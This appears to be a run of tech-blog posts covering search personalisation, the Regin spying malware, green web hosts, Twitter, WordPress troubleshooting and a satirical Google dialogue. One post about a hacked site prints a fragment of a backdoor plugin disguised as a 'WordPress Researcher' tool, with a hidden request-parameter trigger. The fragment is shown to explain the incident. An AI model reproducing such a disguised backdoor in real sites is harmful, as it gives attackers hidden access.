Three different browsers, three different search results

And you thought that SEO was easy.

These days we have any numbers of browsers installed on our machines and searching on them often shows up different results.

According to Google’s Matt Cutts there are three main factors that influence this:

  • Personalisation – whether you are logged in or not
  • Different browsers support different functionality
  • Bucket Testing – different browsers might get different cookies

Cookies could also influence different results between different browsers as well as maybe even presenting different results from a different earlier algorithm.

To personalize your search results, Google uses many sources, the most important one being your search history. You can pause or even delete the search history, but you may find it useful for future reference.

You can temporarily disable Google Personalized Search by adding &pws=0 in the address bar at the end of a Google search URL, e.g.

Using different machines, IP’s, Google accounts and the like bring up even wider anomalies than the simple three searches that you see below. We used one machine and three browsers – one of the browsers (Arora) has never logged in to a Google Account, we logged out of Chrome and stayed logged in to Google on Firefox.

MyPE Chrome

MyPE Arora

MyPE Firefox

Regin – the new computer spying bug

A leading computer security company says it has discovered one of the most sophisticated pieces of malicious software ever seen.

Symantec says the bug, named Regin, was probably created by a government and has been used for six years against a range of targets around the world.

Once installed on a computer, it can do things like capture screenshots, steal passwords or recover deleted files.

Experts say computers in Russia, Saudi Arabia and Ireland have been hit most.

It has been used to spy on government organisations, businesses and private individuals, they say.

Researchers say the sophistication of the software indicates that it is a cyber-espionage tool developed by a nation state.

They also said it likely took months, if not years, to develop and its creators have gone to great lengths to cover its tracks.

Sian John, a security strategist at Symantec, said: “It looks like it comes from a Western organisation. It’s the level of skill and expertise, the length of time over which it was developed.”

Symantec has drawn parallels with Stuxnet, a computer worm thought to have been developed by the US and Israel to target Iran’s nuclear program.

That was designed to damage equipment, whereas Regin’s purpose appears to be to collect information.

Via BBC News – Regin, new computer spying bug, discovered by Symantec.

What others are saying about Regin:

Symantec says:

An advanced piece of malware, known as Regin, has been used in systematic spying campaigns against a range of international targets since at least 2008. A back door-type Trojan, Regin is a complex piece of malware whose structure displays a degree of technical competence rarely seen. Customizable with an extensive range of capabilities depending on the target, it provides its controllers with a powerful framework for mass surveillance and has been used in spying operations against government organizations, infrastructure operators, businesses, researchers, and private individuals.

It is likely that its development took months, if not years, to complete and its authors have gone to great lengths to cover its tracks. Its capabilities and the level of resources behind Regin indicate that it is one of the main cyberespionage tools used by a nation state.

As outlined in a new technical whitepaper from Symantec, Backdoor.Regin is a multi-staged threat and each stage is hidden and encrypted, with the exception of the first stage.  Executing the first stage starts a domino chain of decryption and loading of each subsequent stage for a total of five stages.  Each individual stage provides little information on the complete package. Only by acquiring all five stages is it possible to analyze and understand the threat.

Regin also uses a modular approach, allowing it to load custom features tailored to the target. This modular approach has been seen in other sophisticated malware families such as Flamer and Weevil (The Mask), while the multi-stage loading architecture is similar to that seen in the Duqu/Stuxnet family of threats.

Infection vector and payloads

The infection vector varies among targets and no reproducible vector had been found at the time of writing. Symantec believes that some targets may be tricked into visiting spoofed versions of well-known websites and the threat may be installed through a Web browser or by exploiting an application. On one computer, log files showed that Regin originated from Yahoo! Instant Messenger through an unconfirmed exploit.

Regin uses a modular approach, giving flexibility to the threat operators as they can load custom features tailored to individual targets when required. Some custom payloads are very advanced and exhibit a high degree of expertise in specialist sectors, further evidence of the level of resources available to Regin’s authors.

There are dozens of Regin payloads. The threat’s standard capabilities include several Remote Access Trojan (RAT) features, such as capturing screenshots, taking control of the mouse’s point-and-click functions, stealing passwords, monitoring network traffic, and recovering deleted files.

More specific and advanced payload modules were also discovered, such as a Microsoft IIS web server traffic monitor and a traffic sniffer of the administration of mobile telephone base station controllers.


Regin’s developers put considerable effort into making it highly inconspicuous. Its low key nature means it can potentially be used in espionage campaigns lasting several years. Even when its presence is detected, it is very difficult to ascertain what it is doing. Symantec was only able to analyze the payloads after it decrypted sample files.

It has several “stealth” features. These include anti-forensics capabilities, a custom-built encrypted virtual file system (EVFS), and alternative encryption in the form of a variant of RC5, which isn’t commonly used. Regin uses multiple sophisticated means to covertly communicate with the attacker including via ICMP/ping, embedding commands in HTTP cookies, and custom TCP and UDP protocols.


Regin is a highly-complex threat which has been used in systematic data collection or intelligence gathering campaigns. The development and operation of this malware would have required a significant investment of time and resources, indicating that a nation state is responsible. Its design makes it highly suited for persistent, long term surveillance operations against targets.

The discovery of Regin highlights how significant investments continue to be made into the development of tools for use in intelligence gathering. Symantec believes that many components of Regin remain undiscovered and additional functionality and versions may exist.  Additional analysis continues and Symantec will post any updates on future discoveries.

Re/code says:

The researchers said Regin has been used in what appears to be an ongoing spying operation that started in 2008, stopped suddenly in 2011, and then resumed in 2013.

The campaign was carried out against government organizations, businesses, researchers and private individuals. About 100 Regin infections have been detected, the researchers said, with most — a combined 52 percent — in Russia and Saudi Arabia. The remainder have occurred in Mexico, Ireland, India, Afghanistan, Iran, Belgium, Austria and Pakistan. No infections have yet been detected in the U.S. or China.

Symantec was first made aware of Regin after customers discovered parts of it and sent the code for analysis. “We realized there was more to what was sent us than was readily apparent and went back to investigate further,” said Liam O’Murchu, one of the researchers. Symantec security software can now detect it, he said.

The quality of Regin’s design and the investment required to create it is such that it was almost certainly made by a nation-state, said O’Murchu. But asked to speculate which nation-state, he demurred. “The best clues we have are where the infections have occurred and where they have not,” he said in an interview with Re/code. “We know it was a government that is technically advanced. … This has been a huge spying campaign dating back at least to 2008 and maybe even as early as 2006.”

It doesn’t take much of a leap to wonder out loud if the U.S. National Security Agency or the Central Intelligence Agency, perhaps working with Israel, might be the source, especially given the list of countries targeted. However, there are other possible sources, including China.

Green Web Hosts

With the present load shedding occuring in South Africa we are all acutely aware of the need to conserve energy.

Unfortunately not all of us have the deep deep pockets that a company like Google has when it establishes it’s data centers. For example, in March 2009, Google purchased the Summa Mill from Finnish paper company Stora Enso and converted the 60 year old paper mill into a data center with an initial investment of €200 million. The first phase of the project was completed in September 2011. More than 2,000 individuals working for 50 companies (mostly Finnish and from the local area) contributed to the project.

In August 2012, Google announced an additional €150 million investment in Phase II of the data center, which involved the restoration and conversion of an Alvar Aalto-designed machine hall.

The facility is one of the most advanced and efficient data centers in the Google fleet, making use of a high-tech cooling system, which uses sea water from the Bay of Finland, reduces energy use and is the first of its kind anywhere in the world.

The Google Data Center in Hamina, Finland

In large data centers the typical server will waste up to a third of the energy it uses before any of that energy reaches the parts that do the actual computing. Servers lose the most energy at the power supply, which converts the AC voltage coming from a standard outlet to a set of low DC voltages. They then lose more at the voltage regulator, which further converts the power supply’s output to the voltages required by microchips. Designed with low efficiency standards in order to save on initial cost, traditional servers end up costing much more in electricity in the long run.

Theoretically, web hosting companies that utilise renewable energy and work to make their data centers efficient will save huge energy costs and also save from reusing or recycling.

Most green data centers will use a combination of wind or solar power and the evaporative power of water for cooling.

As a committed ‘greenie’ we went looking for web hosts that had a stated policy about being green (or a link to that policy) from their INDEX Page – if the policy was hidden somewhere else sorry for you.

The green web hosts ones that we highly recommend have a policy of NOT using Renewable Energy Credits and have actually got their hands ‘dirty’ (clean) by directly utilising wind or solar power.

The following web hosts have a stated green web hosting action plan:

Kalk Bay Enlightened Hosting: Asof the 1st of January 2008 the Kalk Bay server network began running on 100% sustainably produced electricity from renewable sources. Kalk Bay say; “We are commited to caring for our Mother planet and providing a service that does no harm to Mother nature. By hosting on renewable energy our sites do no harm to the environment and atmosphere. We are commited to ethical and sustainable practices in every aspect of our work. We encourage organic farming, recycling, renewable energy.” Asof 2011 Kalk Bay were certified carbon neutral. AISO’s data center and office is powered by on-site solar panels within two arrays to generates electricity. This grid is owned and operated by AISO to power the data center and office. AISO boast that they are the first and only 100% completely solar powered, carbon free hosting company that does not use energy credits.

Ecological Hosting: As part of their mission statemnet Ecological Hosting state; “To enlighten the world to the reality of abundant energy supplies through the application of the most abundant (solar) and other renewable energy sources in the provision of services for the modern day phenomena that is the Internet.”

Solar Web Host: The datacentre utilised by Solar Web Host is in California, east of Los Angeles. The data center is powered by 120 solar panels which generate all the electricity. The Solar is owned and operated by the Datacentre to power California’s first and only solar-powered hosting company.

iWeb: iWeb’s Montreal data centers are 98% powered by hydroelectricity produced at just 4 grams of CO2 per Kwh, 56% less CO2 than wind energy and less than 1% than that of gas and coal. Free Cooling in the data centers uses ambient temperatures that are below freezing for around a quarter of the year.

Ilisys: Australian based Ilisys uses 100% Green Power to run their data centre. All power used is renewable energy sourced from the sun, wind, water and waste, all of which limits greenhouse gas emissions in its generation. Ilisys says; “Australia is the highest per capita emitter of greenhouse gases amongst developed nations. And it is increasingly likely that we will be held collectively accountable for our growing greenhouse debt. It makes sense for us to minimise our impact on the environment.”

Planet Mind: Since 1997, Planetmind Internetworks has specialized in the hosting, design, and development of customized, interactive Web sites tailored to the needs of the ecologically- minded online community. Servers are powered by 100% green, renewable solar power, provided by a grid-intertied solar array at their office building in Nederland, Colorado.

Beanstalk Solar Hosting: Beanstalk Solar Hosting is powered by a 3.7 kilowatt solar electric photovoltaic (PV) system installed by Adobe Solar of Colorado. This grid-tied solar PV system has been mounted on the roof just above the Beanstalk Solar Hosting servers and is made up of (20) 185 Watt Mitsubishi Solar Panels and (1) Frontius Solar Inverter. Taking advantage of Colorado’s 300+ days of sunshine, this solar PV system is expected to produce an average of 410 Kilowatt-hours (kWh) of electricity per month. Over the next 30 years, this system will use the free energy from the sun to offset more than 189,000 lbs of CO2, equivalent to driving 220,000 miles, according to Greg Koss owner of Adobe Solar. In addition to providing clean renewable solar electricity, the system is expected to provide savings of over $48,000 in electrical costs at today’s rates.

iPage: iPage has reduced its carbon footprint by purchasing enough Renewable Energy Certificates (RECs), to offset our energy use by 200%

Green Geeks: GreenGeeks claim that they are the industry’s leading green energy web hosting provider putting back 3 times into the grid through wind energy that they consume. Based in Los Angeles, California Green Geeks services customers from over 150 countries.

Is your web hosting company green? Add your comments below.

Dear Twitter – Apply the KIST Principle

In the automotive world marketers place all kinds of bling on and into vehicles nearing the end of their life cycle. Limited editions, mag wheels, go faster stripes, red leather seats, carpets on the dashboard, oranges on the aerial………

Twitter recently announced a slew of new features:

Instant Timeline: To help ease Twitter’s new user retention problem, users will be presented with a full stream of content quickly during the on-boarding process — an Instant Timeline — even if they haven’t followed anyone yet.

Timeline Highlights: Twitter is testing a “While you were away” feature in the mobile app.

SEO & Google: Twitter says it is doing more to increase the amount of traffic it attracts from Google and search engines.

DM Features: Twitter will give users the ability to share and discuss tweets privately via Direct Message.

Native Video: Currently Twitter’s native motion picture options are limited to animated GIFs, six-second Vines and video from publishers and major brands, but in the first half of 2015 it will give users the ability to record, edit and upload video on the network.

Quick Promote: Twitter is in the early stages of testing a streamlined ad campaign launcher for marketers who don’t have the time or inclination to dig into the complexities of the regular ad platform.

These features are horribly similar to an end of life cycle motor vehicle feature set:

Instant Timeline: To help ease the purchaser onto the road all vehicles come with a full tank of petrol

Timeline Highlights: A sexy voice prompt will welcome the driver back into the vehicle.

SEO & Google: A snazzy paint job to get the driver noticed.

DM Features: An exclusive owners only lounge at each dealer.

Native Video: A free DVD player.

Quick Promote: All bakkies come with a free canopy.

Yes, you know it – we have all bought a new vehicle that has been around for ages based on one or more of the above only to see a brand new version reach the dealer a few months later.

The questions have to be asked; Do you really know why you use Twitter? Are you getting a good return on your investment? Will the new features make you engage more?

Personally I find it tiresome to wade through my timeline – hence my determination to not follow anyone, choosing rather to engage via @notifications and usine tools to curate hashtags – like #PortElizabeth which presents the PortElizabeth hashtag on ONE page from a host of social media sites.

Adding more features demands a greater amount of time and smells a lot like adding bling.

KIST – Keep It Simple Twitter.

Share Tweet via DM

Why you should know that I fixed a water leak the other day

Generating content for a few busy WordPress web sites, whilst ensuring that the core, plugins and themes are up to date can sometimes be challenging.

One of the key tools in our arsenal is a plugin called Infinite WP. With Infinite WP I can keep all sites linked to it up to date without visiting the WP Admin panel of each individual site. A virtual assistant that doesn’t go on strike or demand a larger slice of the ‘small’ pie every year.

When Infinite WP loses contact with the client plugin installed on individual WordPress sites it throws out a message in the Infinite WP console that goes like this; “Houston we have a problem!” Well, actually not really those words but you get my meaning anyway?

One of my busier sites recently lost comms with the Infinite WP console so like a good little boy off I went to see what could be the problem. At this stage of the conversation you need to know that almost 95% of the content on this particular web site is posted via WordPress’ handy little ‘Press This’ function or via the WordPress App on my Android Tablet so I you will appreciate that I don’t have the WP Admin open all the time.

After surviving many hacking attempts I don’t get that sinking feeling in the pit of my stomach anymore after opening up a web site only to see that it has been hacked. In moments of panic us human beings are prone to blame someone else first rather than just tackle and fix a problem. This is normally when, without thinking, the normal person opens a ticket with tech support who then struggle to translate this new language consisting mostly of four letter words and not much else.

Suffice to say my web site had been a victim of hacker who had placed a plugin in my wp-content plugins folder that had ‘hidden’ all my other plugins (hence the message from Infinite WP) and placed some dodgy code on many pages.

It just so happens that I am hosted by a host (geddit?) of nice guys who have vast experience in this business. It also so happens that the universe decided that I hadn’t had enough troubles for one day so the water pipe running across one of my roofs decided to burst at the same time.

What did I do?

In the old days I would have ignored the water leak and concentrated on fixing the hack.

The new me though handed my problem over to Edward and Robert at Serv Hosting – they looked for a clean backup and restored the site as well as a clean up to date database – all in less time than it took me to fix my water leak.

The backdoor plugin was called research_plugin.php and contained a backdoor code hooked up to the theme.


Plugin Name: WordPress Researcher
Plugin URI:
Description: WordPress research tool.
Author: wordpressdotorg
Author URI:
Text Domain: wordpress-researcher
License: GPL version 2 or later –
Version: 2.2.4

Copyright 2013  wordpressdotorg

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA

function research_plugin()
if (isset($_REQUEST[‘CSSl’]))

add_action(‘after_setup_theme’, ‘research_plugin’);

What to do when stuff stops working on your WordPress site

I recently received get this frantic message from a client who owns a Guest House in Port Elizabeth; “My booking requests from my web site were non-existent for a couple of weeks and a regular client has just let me know that the booking form on my web site does not work!”

This Guest House web site runs on a Studiopress WordPress theme and utilises Gravity Forms for bookings. With any dynamic web site like WordPress one is required to check for plugin and core updates on a regular basis – if you don’t you run the real risk of your web site not running optimally and losing business.

Here is a quick user guide to solving such a problem:

  1. Get into the habit of checking that the dynamic portions of your site do work – like the booking and contact forms.
  2. If someone says a form does not work test it yourself.
  3. Do not always assume the worst if the form doesn’t work – check if an update is available as that will normally sort any problems out.
  4. If an update doesn’t work then it is possible that you have a conflict with one or other plugin and you will need to deactivate ALL your plugins except the one you have problems with and then check again.
  5. If the problem persists deactivate your theme and activate one of the standard WordPress themes.
  6. If that still does not work then revert to the plugin provider giving as much info as possible – WP version as well as plugins and versions used.
  7. Or you could pay your webmaster to do it for you.

Advice to SA’s Job Seeking Matrics

With hundreds of thousands of South African matrics being released onto the job market one wonders just how the “I got more than 30%” jobless will find a job.

Maybe our education department could add a ‘How to video and upload your CV to YouTube’ module to the compulsory Life Orienation subject.

Recruitment specialist Hello My Name Is… (HMNI) recently questioned hundreds of UK business leaders to ascertain what makes one CV more engaging than another and discovered that candidates uploading a video accompaniment alongside their CV that have the edge. “While the technology for video applications has been in place for some time, only now are candidates taking full advantage of this option, which in turn has given recruiters a real appetite for innovative applications,” said Jonathan Flint, joint managing director of HMNI with partner James Hyde. “As such we predict a video accompaniment will be an essential part of applying for a job in 2014.”

HMNI predict that video accompaniment to traditional CV is set to be a key trend in recruitment in 2014 as 70% employers admit CVs no longer enough to differentiate between candidates

Of the few YouTube job seeking videos that I viewed the one by Benjamin Gilson really caught my eye. Benjamin is looking for a job in video or digital media and the soundtrack featured one of my favourite Elvis Presley songs – A Little Less Conversation.

Watch and learn:

More about Server Observer

Edward Labuschagne and Alan Straton started Server Observer as a way to publish those geeky articles that didn’t quite fit in any of Alan’s ‘My Complex‘ Spaces or Edward’s Photo Addict project.

Alan has been working online since 2001 and in 2005 started the online community news and business directory – MyPE – at the behest of an old school friend. MyPE continues to grow and evolve and keep him in beer money – Alan is very thirsty.

In addition to Photo Addict Edward also does does online tech support, SEO and Web Design so Server Observer is a decent manageable fit for him. Server Observer educates and comments on tech, social media, web hosting, web design and the internet industry. Edward, Alan and contributing authors write original articles to as well as curate from press releases.

Of course we want to share the love and are constantly open to articles from regular contributors. You can submit a single article for consideration or sign up to become an author.

At present we offer AUTHORS recompense in the form of a bit of fame and links back to your site/s or products. We accomplish this by creating an Author box and Archive for you – e.g. – the author box at the top of the archive links back to Alan’s writing on MyPE.

Have a look at the Author Box at the bottom of this article – – and click on each of the tabs to see what we do to ‘advertise’ you and your services.

We are exploring/looking to develop an elegant solution that will place each Author’s chosen advert next to each author’s article. We have trialled and rejected many advertising revenue share plugins and are open to further suggestions from the community.

Essentially what we achieve for each author is the creation of a space, from which any author will reap maximum benefit from in terms of showcasing his/her work, getting referrals and also earning a few bob on the side via display adverts.

See more and sign up here:

Essentially we are looking for authors who see the benefit of creating their own niche as an expert on an industry related platform.

Save a Million Rand on Social Media monitoring

If you ever doubted that social media is big business then maybe the fact that big business is looking at ways to save money on social media monitoring will change your mind.

Facebook Logo Official

Facebook Logo Official

Nedbank Limited, a leading financial services provider throughout Southern Africa, is using IBM’s predictive analytics solutions to improve the customer experience and provide more responsive real-time services. As a result of this technology implementation, the bank has reduced social media monitoring costs by over a million rand a year, while boosting customer service productivity levels by 20 percent.

Nedbank partnered with IBM and its Business Partner Olrac spSolutions to develop a predictive modeling solution that integrates social media analytics into the bank’s systems. By doing so, decision makers across the bank’s operations now have access to deep, near-real-time analysis of social media data through flexible dashboards. This gives marketers potent insights regarding preferences, sentiment and satisfaction that help to craft and deliver more effective sales promotions and customer messages.

Nedbank recognizes the growing importance of social media as a marketing tool, actively reaching out to customers through Facebook, LinkedIn and Twitter, as well as through blogs and customer forums.

“By improving our social media analytics capabilities, we’re engaging with our customers on a 1:1 basis, to address and anticipate their needs more cohesively,” says Eugene Liebenberg, head of Retail Business Intelligence Solution Science at Nedbank.

Gordon Barnes, Industry Solutions Leader at IBM South Africa says, “Where before the bank used a number of tools and external resources to mine social media for a 360 view of their customers, today the analytics provide a visual dashboard of customer feedback and opinion in near-real time from social media. This has helped Nedbank transform the process of customer engagement and response by embedding information-based insights into every process, decision and action.”

“By using advanced analytics, Nedbank is in a prime position to sharply focus marketing campaigns, promote high profit margins and increase cross-selling opportunities,” concludes Barnes.

The solution used a combination of IBM predicative analytics SPSS Collaboration and Deployment Services, SPSS Modeler.

Larry loses to the analyst

Taking into account the fact that Google is actually owned by millions of greedy shareholders who continually clamour for the share price, interest and dividends to be ‘massaged’ to make them rich I often wake up after a nightmare in which the following conversation occurs:

A phone rings and a voice answers saying; “Larry here how can I help you?”

The caller, a stock analyst (let’s call him Dick) for a large international brokerage firm, is known to Larry as a particularly nasty specimen of mankind who, unlike Larry and Sergey has never tried to “Do no evil”!

The conversation is short and nasty:

Analyst: “Larry, you and your team need to massage those numbers up again – I have a number of large institutional investors looking to move their money into higher yielding tech stocks and the loss of hundreds of billions in investment stock will hurt your company big time.”

Larry: “As you know Dick we have a number of long term projects in the pipeline which will contribute to stability and long term profits for all investors.”

Analyst: “Larry, our clients are only interested in short to medium term profits and I want you to accelerate this “Pay to Display” product that you have on Google.”

Larry: “As you are aware, Dick, we give free rankings to web sites that play our game properly and those web sites that have the highest number of other web sites linking to them are the ones that appear on the first page of any search done by people looking for that business or knowledge source.”

Analyst: “So you are telling me that you spend billions of stockholders dollars on giving traffic away to other web sites?”

Larry: “Umm, well, it doesn’t really work like that ….”

Analyst: “I certainly looks like a real airy fairy way of doing business. Remember Larry, business is about profit and not charity. That is why we hire expensive PR firms to tell the sheeple about those minuscule amounts you spend on the bloody ‘community’ – at least that way we get more publicity than if we had to buy space in the traditional media!”

Larry: “But, Dick, you have to see our inclusion of the linking factors as a way of advertising our superior searching services as well?”

Analyst: “Larry, my dear boy, there comes a time when you have to say enough and stop giving stuff away and that time is now in 2014.”

Larry: “So what would you suggest we do Dick?”

Analyst: “You need to stop ranking people on links – it uses up too many resources. The way I see it you can do one of two things: Remove the linking factors entirely from the algorithm and rank based on the use of Google Plus / YouTube and other Google products ONLY or leave the link ranking factors in the algorithm and charge each and every web site that wants to get traffic an annual set fee per link – that way we will get all the money that those clowns are spending on other bloody clowns trying to game our (Google’s) system.”

Larry: “But isn’t that little evil, Dick?”

Analyst: “Of course Larry – war is evil but those who are MOST evil win the war, now go on and win that bloody war for us Larry!”

Larry: “Yes, Dick!”

What will YOU do if the above conversation becomes a reality?